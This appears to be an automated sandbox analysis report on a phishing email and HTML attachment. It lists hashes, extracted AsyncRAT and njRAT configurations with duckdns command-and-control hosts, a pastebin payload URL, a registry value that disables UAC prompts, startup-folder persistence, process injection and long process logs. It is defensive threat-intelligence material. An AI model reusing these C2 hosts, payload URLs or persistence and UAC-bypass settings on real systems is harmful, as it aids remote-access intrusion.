Overview
overview
10Static
static
1Validació...1).eml
windows7-x64
5Validació...1).eml
windows10-2004-x64
3attachment-3.eml
windows7-x64
5attachment-3.eml
windows10-2004-x64
3email-html-2.html
windows7-x64
3email-html-2.html
windows10-2004-x64
10email-plain-1.txt
windows7-x64
1email-plain-1.txt
windows10-2004-x64
1image_2024...8Z.png
windows7-x64
3image_2024...8Z.png
windows10-2004-x64
3email-html-2.html
windows7-x64
3email-html-2.html
windows10-2004-x64
3email-plain-1.txt
windows7-x64
1email-plain-1.txt
windows10-2004-x64
1Resubmissions
17-10-2024 17:13
241017-vrvb1awdmb 10Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-10-2024 17:13
Static task
static1
Behavioral task
behavioral1
Sample
Validación correo malicioso o SPAM(1).eml
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Validación correo malicioso o SPAM(1).eml
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
attachment-3.eml
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
attachment-3.eml
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
email-html-2.html
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
email-html-2.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
email-plain-1.txt
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
email-plain-1.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
image_2024_04_09T20_41_14_468Z.png
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
image_2024_04_09T20_41_14_468Z.png
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
email-html-2.html
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
email-html-2.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
email-plain-1.txt
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
email-plain-1.txt
Resource
win10v2004-20241007-en
General
-
Target
email-html-2.html
-
Size
1KB
-
MD5
e30672a61f4a8f232239d5046bb8d4ed
-
SHA1
82408b73208d1fc46cdd5f875e6fc139bac5dc34
-
SHA256
e8e74f88d1310a69c3092c2af288d0aeb9009bd80b7a6dcaf9a796362f82954e
-
SHA512
3e03339e04580ce4dc35058a722485077315767c36109576dc899919f09f4c5c1097f8fac5906e13b8f6170313c6a59e5151f06904e87730acce9405c7eaf7d5
Malware Config
Extracted
https://pastebin.com/raw/Adv9gBHa
https://pastebin.com/raw/Adv9gBHa
Extracted
https://pastebin.com/raw/Adv9gBHa
https://pastebin.com/raw/Adv9gBHa
Extracted
https://pastebin.com/raw/Adv9gBHa
https://pastebin.com/raw/Adv9gBHa
Extracted
asyncrat
1.0.7
septiembre20
peinadorafael777.duckdns.org:2013
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
20agosto
carlitosmoreno1791.duckdns.org:2017
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
njrat
0.7NC
NYAN CAT
carlitosmoreno1794.duckdns.org:2019
bde06c84e1de4b23b
-
reg_key
bde06c84e1de4b23b
-
splitter
@!#&^%$
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 79 208 powershell.exe 80 1600 powershell.exe 81 3200 powershell.exe 83 3200 powershell.exe 84 1600 powershell.exe 85 208 powershell.exe 87 1600 powershell.exe 88 208 powershell.exe 89 3200 powershell.exe 93 208 powershell.exe 94 3200 powershell.exe 95 1600 powershell.exe 100 208 powershell.exe 101 3200 powershell.exe 102 1600 powershell.exe 106 5920 powershell.exe 107 5920 powershell.exe 110 5920 powershell.exe 111 5920 powershell.exe 112 5920 powershell.exe 116 5428 powershell.exe 117 5428 powershell.exe 119 5428 powershell.exe 120 5428 powershell.exe 121 5428 powershell.exe 123 748 powershell.exe 124 748 powershell.exe 126 748 powershell.exe 127 748 powershell.exe 128 748 powershell.exe 148 1764 powershell.exe 149 1764 powershell.exe 151 1764 powershell.exe 152 1764 powershell.exe 153 1764 powershell.exe 155 2456 powershell.exe 156 2456 powershell.exe 158 2456 powershell.exe 159 2456 powershell.exe 160 2456 powershell.exe 161 6024 powershell.exe 162 6024 powershell.exe 163 6024 powershell.exe 166 6024 powershell.exe 167 6024 powershell.exe 169 2508 powershell.exe 170 2508 powershell.exe 172 2508 powershell.exe 175 2508 powershell.exe 176 2508 powershell.exe 178 1212 powershell.exe 179 1212 powershell.exe 181 1212 powershell.exe 182 1212 powershell.exe 183 1212 powershell.exe 187 6096 powershell.exe 189 6096 powershell.exe 191 6096 powershell.exe 194 6096 powershell.exe 195 6096 powershell.exe 196 5208 powershell.exe 197 5208 powershell.exe 199 5208 powershell.exe 200 5208 powershell.exe -
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____bjwql________________________________________-------.lnk powershell.exe -
pid Process 4524 powershell.exe 5220 powershell.exe 208 powershell.exe 1600 powershell.exe 5280 powershell.exe 4808 powershell.exe 5208 powershell.exe 2336 powershell.exe 2456 powershell.exe 5624 powershell.exe 2508 powershell.exe 3200 powershell.exe 2852 powershell.exe 5428 powershell.exe 748 powershell.exe 6024 powershell.exe 5488 powershell.exe 1212 powershell.exe 6096 powershell.exe 5552 powershell.exe 5776 powershell.exe 5428 powershell.exe 5336 powershell.exe 1700 powershell.exe 3160 powershell.exe 5920 powershell.exe 2600 powershell.exe 3192 powershell.exe 1764 powershell.exe 5160 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 34 IoCs
flow ioc 148 pastebin.com 149 bitbucket.org 162 bitbucket.org 169 pastebin.com 170 bitbucket.org 54 bitbucket.org 79 pastebin.com 123 pastebin.com 178 pastebin.com 196 pastebin.com 82 bitbucket.org 189 bitbucket.org 204 bitbucket.org 161 pastebin.com 81 pastebin.com 106 pastebin.com 187 pastebin.com 188 bitbucket.org 197 bitbucket.org 78 pastebin.com 84 bitbucket.org 117 bitbucket.org 203 pastebin.com 85 bitbucket.org 107 bitbucket.org 155 pastebin.com 124 bitbucket.org 53 bitbucket.org 80 pastebin.com 116 pastebin.com 179 bitbucket.org 55 bitbucket.org 83 bitbucket.org 156 bitbucket.org -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 208 set thread context of 5540 208 powershell.exe 133 PID 3200 set thread context of 5604 3200 powershell.exe 134 PID 1600 set thread context of 5644 1600 powershell.exe 135 PID 5920 set thread context of 6068 5920 powershell.exe 140 PID 5428 set thread context of 884 5428 powershell.exe 145 PID 748 set thread context of 2240 748 powershell.exe 150 PID 1764 set thread context of 5716 1764 powershell.exe 166 PID 2456 set thread context of 5236 2456 powershell.exe 176 PID 6024 set thread context of 3784 6024 powershell.exe 180 PID 2508 set thread context of 5288 2508 powershell.exe 187 PID 1212 set thread context of 5568 1212 powershell.exe 196 PID 6096 set thread context of 1444 6096 powershell.exe 210 PID 5208 set thread context of 5532 5208 powershell.exe 219 PID 4808 set thread context of 4872 4808 powershell.exe 226 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 3 IoCs
pid Process 4248 taskkill.exe 4680 taskkill.exe 3580 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5232 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 360945.crdownload:SmartScreen msedge.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 5492 Notepad.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4392 msedge.exe 4392 msedge.exe 4860 msedge.exe 4860 msedge.exe 4152 identity_helper.exe 4152 identity_helper.exe 1764 msedge.exe 1764 msedge.exe 1700 powershell.exe 1700 powershell.exe 3192 powershell.exe 3192 powershell.exe 3192 powershell.exe 1700 powershell.exe 3160 powershell.exe 3160 powershell.exe 3160 powershell.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 208 powershell.exe 208 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 208 powershell.exe 5776 powershell.exe 5776 powershell.exe 5776 powershell.exe 5920 powershell.exe 5920 powershell.exe 5920 powershell.exe 5280 powershell.exe 5280 powershell.exe 5280 powershell.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 2852 powershell.exe 2852 powershell.exe 2852 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 1764 powershell.exe 1764 powershell.exe 1764 powershell.exe 4524 powershell.exe 4524 powershell.exe 4524 powershell.exe 5644 AddInProcess32.exe 5644 AddInProcess32.exe 1764 powershell.exe 1764 powershell.exe 5488 powershell.exe 5488 powershell.exe 5488 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 6024 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 5776 powershell.exe Token: SeDebugPrivilege 5920 powershell.exe Token: SeDebugPrivilege 5644 AddInProcess32.exe Token: SeDebugPrivilege 5280 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 5488 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 6024 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 5220 powershell.exe Token: SeDebugPrivilege 5624 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 3784 AddInProcess32.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 3492 powershell.exe Token: SeDebugPrivilege 4680 taskkill.exe Token: SeDebugPrivilege 5288 AddInProcess32.exe Token: 33 5288 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 5288 AddInProcess32.exe Token: SeDebugPrivilege 5160 powershell.exe Token: SeDebugPrivilege 6096 powershell.exe Token: 33 5288 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 5288 AddInProcess32.exe Token: SeDebugPrivilege 5336 powershell.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 5552 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: 33 5288 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 5288 AddInProcess32.exe Token: SeDebugPrivilege 3580 taskkill.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
pid Process 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe 4860 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4860 wrote to memory of 512 4860 msedge.exe 84 PID 4860 wrote to memory of 512 4860 msedge.exe 84 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 312 4860 msedge.exe 85 PID 4860 wrote to memory of 4392 4860 msedge.exe 86 PID 4860 wrote to memory of 4392 4860 msedge.exe 86 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87 PID 4860 wrote to memory of 3136 4860 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\email-html-2.html1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93e5d46f8,0x7ff93e5d4708,0x7ff93e5d47182⤵PID:512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:22⤵PID:312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:82⤵PID:3136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵PID:2236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:82⤵PID:1764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵PID:756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:12⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:12⤵PID:4920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:12⤵PID:2376
-
-
